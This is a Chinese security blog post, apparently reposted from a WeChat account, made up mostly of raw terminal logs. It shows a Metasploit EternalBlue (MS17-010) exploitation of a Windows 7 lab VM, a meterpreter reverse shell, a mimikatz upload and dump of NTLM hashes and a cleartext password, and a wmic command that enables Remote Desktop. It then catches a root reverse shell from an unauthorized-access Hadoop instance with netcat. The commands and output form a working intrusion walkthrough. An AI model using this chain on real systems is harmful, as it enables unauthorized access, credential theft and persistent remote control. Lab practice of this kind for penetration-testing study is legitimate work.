(base) ➜ ~ msfconsole  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

 =[ metasploit v5.0.102-dev-37e0c7d01701fe276ef76f9e30d807261866e9df]+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post ]+ -- --=[ 562 payloads - 45 encoders - 10 nops ]+ -- --=[ 7 evasion ]
Metasploit tip: View missing module options with show missing
msf5 > search ms17-010
Matching Modules================
 # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce
msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.211.55.5rhosts => 10.211.55.5msf5 auxiliary(scanner/smb/smb_ms17_010) > set rport 445rport => 445msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[-] 10.211.55.5:445 - An SMB Login Error occurred while connecting to the IPC$ tree.[*] 10.211.55.5:445 - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedmsf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.211.55.8rhosts => 10.211.55.8msf5 auxiliary(scanner/smb/smb_ms17_010) > set rport 445rport => 445msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.211.55.8:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)[*] 10.211.55.8:445 - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedmsf5 auxiliary(scanner/smb/smb_ms17_010) > use ms17_010_eternalblue
Matching Modules================
 # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 1 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+

Interact with a module by name or index, for example use 1 or use exploit/windows/smb/ms17_010_eternalblue_win8
msf5 auxiliary(scanner/smb/smb_ms17_010) > use 1[-] Failed to load module: exploit/windows/smb/ms17_010_eternalblue_win8msf5 auxiliary(scanner/smb/smb_ms17_010) > use 0[-] Failed to load module: exploit/windows/smb/ms17_010_eternalblue_win8msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcpmsf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.211.55.8rhosts => 10.211.55.8msf5 exploit(windows/smb/ms17_010_eternalblue) > set rport 445rport => 445msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.1.2:4444 [*] 10.211.55.8:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check[+] 10.211.55.8:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)[*] 10.211.55.8:445 - Scanned 1 of 1 hosts (100% complete)[*] 10.211.55.8:445 - Connecting to target for exploitation.[+] 10.211.55.8:445 - Connection established for exploitation.[+] 10.211.55.8:445 - Target OS selected valid for OS indicated by SMB reply[*] 10.211.55.8:445 - CORE raw buffer dump (38 bytes)[*] 10.211.55.8:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima[*] 10.211.55.8:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [*] 10.211.55.8:445 - 0x00000020 50 61 63 6b 20 31 Pack 1 [+] 10.211.55.8:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 10.211.55.8:445 - Trying exploit with 12 Groom Allocations.[*] 10.211.55.8:445 - Sending all but last fragment of exploit packet[*] 10.211.55.8:445 - Starting non-paged pool grooming[+] 10.211.55.8:445 - Sending SMBv2 buffers[+] 10.211.55.8:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 10.211.55.8:445 - Sending final SMBv2 buffers.[*] 10.211.55.8:445 - Sending last fragment of exploit packet![*] 10.211.55.8:445 - Receiving response from exploit packet[+] 10.211.55.8:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*] 10.211.55.8:445 - Sending egg to corrupted connection.[*] 10.211.55.8:445 - Triggering free of corrupted buffer.[*] Sending stage (201283 bytes) to 192.168.1.2[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:49249) at 2020-08-08 20:00:18 +0800[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > shellProcess 2792 created.Channel 1 created.Microsoft Windows [?汾 6.1.7601]??Ȩ???? (c) 2009 Microsoft Corporation??????????Ȩ????
C:\Windows\system32>chcp 65001chcp 65001Active code page: 65001
C:\Windows\system32>ipconfig ipconfig
Windows IP Configuration

Ethernet adapter ???????? 2:
 Connection-specific DNS Suffix . : localdomain IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4:0:7002:eaf9:c043:7b1b Temporary IPv6 Address. . . . . . : fdb2:2c26:f4e4:0:cde9:7d52:8c02:9037 Link-local IPv6 Address . . . . . : fe80::7002:eaf9:c043:7b1b%14 IPv4 Address. . . . . . . . . . . : 10.211.55.8 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : fe80::21c:42ff:fe00:18%14 10.211.55.1
Tunnel adapter isatap.localdomain:
 Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : localdomain
C:\Windows\system32>exitexitmeterpreter > shellProcess 2852 created.Channel 2 created.Microsoft Windows [?汾 6.1.7601]??Ȩ???? (c) 2009 Microsoft Corporation??????????Ȩ????
C:\Windows\system32>chcp 65001chcp 65001Active code page: 65001
C:\Windows\system32>systeminfosysteminfo
Host Name: RETURN0FA54OS Name: Microsoft Windows 7 Ultimate OS Version: 6.1.7601 Service Pack 1 Build 7601OS Manufacturer: Microsoft CorporationOS Configuration: Standalone WorkstationOS Build Type: Multiprocessor FreeRegistered Owner: return0;Registered Organization: Product ID: 00426-384-1216344-06000Original Install Date: 2020/7/13, 1:45:07System Boot Time: 2020/8/8, 14:45:29System Manufacturer: Parallels Software International Inc.System Model: Parallels Virtual PlatformSystem Type: x64-based PCProcessor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~2400 MhzBIOS Version: Parallels Software International Inc. 15.1.4 (47270), 2020/4/13Windows Directory: C:\WindowsSystem Directory: C:\Windows\system32Boot Device: \Device\HarddiskVolume1System Locale: zh-cn;Chinese (China)Input Locale: en-us;English (United States)Time Zone: N/ATotal Physical Memory: 4,096 MBAvailable Physical Memory: 3,313 MBVirtual Memory: Max Size: 8,189 MBVirtual Memory: Available: 7,308 MBVirtual Memory: In Use: 881 MBPage File Location(s): C:\pagefile.sysDomain: WORKGROUPLogon Server: N/AHotfix(s): 2 Hotfix(s) Installed. [01]: KB2534111 [02]: KB976902Network Card(s): 1 NIC(s) Installed. [01]: Parallels Ethernet Adapter Connection Name: 本地鏈接 2 DHCP Enabled: Yes DHCP Server: 10.211.55.1 IP address(es) [01]: 10.211.55.8 [02]: fe80::7002:eaf9:c043:7b1b [03]: fdb2:2c26:f4e4:0:cde9:7d52:8c02:9037 [04]: fdb2:2c26:f4e4:0:7002:eaf9:c043:7b1b
C:\Windows\system32>exitexitmeterpreter > upload /Users/return0/Desktop/tools/10內網滲透/mimikatz_trunk/x64/mimikatz.exe[*] uploading : /Users/return0/Desktop/tools/10內網滲透/mimikatz_trunk/x64/mimikatz.exe -> mimikatz.exe[*] Uploaded 1.21 MiB of 1.21 MiB (100.0%): /Users/return0/Desktop/tools/10內網滲透/mimikatz_trunk/x64/mimikatz.exe -> mimikatz.exe[*] uploaded : /Users/return0/Desktop/tools/10內網滲透/mimikatz_trunk/x64/mimikatz.exe -> mimikatz.exemeterpreter > shellProcess 1088 created.Channel 4 created.Microsoft Windows [?汾 6.1.7601]??Ȩ???? (c) 2009 Microsoft Corporation??????????Ȩ????
C:\Windows\system32>whoamiwhoamint authority\system
C:\Windows\system32>chcp 65001chcp 65001Active code page: 65001C:\Windows\system32>mimikatz.exemimikatz.exe
 .#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # sekurlsa::logopasswordsERROR mimikatz_doLocal ; "logopasswords" command of "sekurlsa" module not found !
Module : sekurlsaFull name : SekurLSA moduleDescription : Some commands to enumerate credentials...
 msv - Lists LM & NTLM credentials wdigest - Lists WDigest credentials kerberos - Lists Kerberos credentials tspkg - Lists TsPkg credentials livessp - Lists LiveSSP credentials ssp - Lists SSP credentials logonPasswords - Lists all available providers credentials process - Switch (or reinit) to LSASS process context minidump - Switch (or reinit) to LSASS minidump context bootkey - Set the SecureKernel Boot Key to attempt to decrypt LSA Isolated credentials pth - Pass-the-hash krbtgt - krbtgt! dpapisystem - DPAPI_SYSTEM secret trust - Antisocial backupkeys - Preferred Backup Master keys tickets - List Kerberos tickets ekeys - List Kerberos Encryption Keys dpapi - List Cached MasterKeys credman - List Credentials Manager
mimikatz # sekurlsa::logonPasswords
Authentication Id : 0 ; 73647 (00000000:00011faf)Session : Interactive from 1User Name : return0Domain : RETURN0FA54Logon Server : RETURN0FA54Logon Time : 2020/8/8 14:45:41SID : S-1-5-21-2676871807-2807053931-1165176819-1000 msv :  [00000003] Primary * Username : return0 * Domain : RETURN0FA54 * LM : b47f9a39939fbe2e3cfeb463bfee415c * NTLM : 52dec73c7fb089d8917fbdf7985b6036 * SHA1 : f072ae3248a49934bd3d472cdf8ffcaffa74f7bf tspkg :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! wdigest :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! kerberos :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! ssp :  credman : 
Authentication Id : 0 ; 73594 (00000000:00011f7a)Session : Interactive from 1User Name : return0Domain : RETURN0FA54Logon Server : RETURN0FA54Logon Time : 2020/8/8 14:45:41SID : S-1-5-21-2676871807-2807053931-1165176819-1000 msv :  [00000003] Primary * Username : return0 * Domain : RETURN0FA54 * LM : b47f9a39939fbe2e3cfeb463bfee415c * NTLM : 52dec73c7fb089d8917fbdf7985b6036 * SHA1 : f072ae3248a49934bd3d472cdf8ffcaffa74f7bf tspkg :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! wdigest :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! kerberos :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! ssp :  credman : 
Authentication Id : 0 ; 997 (00000000:000003e5)Session : Service from 0User Name : LOCAL SERVICEDomain : NT AUTHORITYLogon Server : (null)Logon Time : 2020/8/8 14:45:40SID : S-1-5-19 msv :  tspkg :  wdigest :  * Username : (null) * Domain : (null) * Password : (null) kerberos :  * Username : (null) * Domain : (null) * Password : (null) ssp :  credman : 
Authentication Id : 0 ; 996 (00000000:000003e4)Session : Service from 0User Name : RETURN0FA54$Domain : WORKGROUPLogon Server : (null)Logon Time : 2020/8/8 14:45:40SID : S-1-5-20 msv :  tspkg :  wdigest :  * Username : RETURN0FA54$ * Domain : WORKGROUP * Password : (null) kerberos :  * Username : return0fa54$ * Domain : WORKGROUP * Password : (null) ssp :  credman : 
Authentication Id : 0 ; 30280 (00000000:00007648)Session : UndefinedLogonType from 0User Name : (null)Domain : (null)Logon Server : (null)Logon Time : 2020/8/8 14:45:39SID :  msv :  tspkg :  wdigest :  kerberos :  ssp :  credman : 
Authentication Id : 0 ; 999 (00000000:000003e7)Session : UndefinedLogonType from 0User Name : RETURN0FA54$Domain : WORKGROUPLogon Server : (null)Logon Time : 2020/8/8 14:45:39SID : S-1-5-18 msv :  tspkg :  wdigest :  * Username : RETURN0FA54$ * Domain : WORKGROUP * Password : (null) kerberos :  * Username : return0fa54$ * Domain : WORKGROUP * Password : (null) ssp :  credman : 
mimikatz # exitBye!C:\Windows\system32>wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1Executing (\\RETURN0FA54\ROOT\CIMV2\TerminalServices:Win32_TerminalServiceSetting.ServerName="RETURN0FA54")->SetAllowTSConnections()Method execution successful.Out Parameters:instance of __PARAMETERS{ ReturnValue = 0;};C:\Windows\system32>exit

漏洞利用-Hadoop未受權訪問Getshell

Last login: Sat Aug 8 19:54:07 on ttys001(base) ➜ ~ nc -l 8888bash: cannot set terminal process group (211): Inappropriate ioctl for devicebash: no job control in this shell<33412_0001/container_1596872533412_0001_01_000001# whoamiwhoamiroot<33412_0001/container_1596872533412_0001_01_000001# ifconfigifconfigeth0 Link encap:Ethernet HWaddr 02:42:ac:1a:00:02  inet addr:172.26.0.2 Bcast:172.26.255.255 Mask:255.255.0.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:17365 errors:0 dropped:0 overruns:0 frame:0 TX packets:34456 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0  RX bytes:1858357 (1.7 MiB) TX bytes:5760591 (5.4 MiB)
lo Link encap:Local Loopback  inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:8 errors:0 dropped:0 overruns:0 frame:0 TX packets:8 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000  RX bytes:647 (647.0 B) TX bytes:647 (647.0 B)
<33412_0001/container_1596872533412_0001_01_000001# ididuid=0(root) gid=0(root) groups=0(root)<33412_0001/container_1596872533412_0001_01_000001# exit

說句題外話

本來是這樣的

結果是這樣的

最後就變成了這樣的

感謝您耐着性子看到了這兒。完整版在語雀裏，若是想看完整版，歡迎加入個人語雀團隊，有意組一個隊，畢竟一我的非常孤獨，但願有更多人來和我一塊兒完善和積澱語雀文庫，記錄本身所學所得所悟。能夠經過微信公衆號私信我便可。我會告訴你怎麼加入。（有門檻，可是不高，目的是爲了查看你適合不適合加入）

本文分享自微信公衆號 - 攻防SRC（SNNUSRC）。
若有侵權，請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」，歡迎正在閱讀的你也加入，一塊兒分享。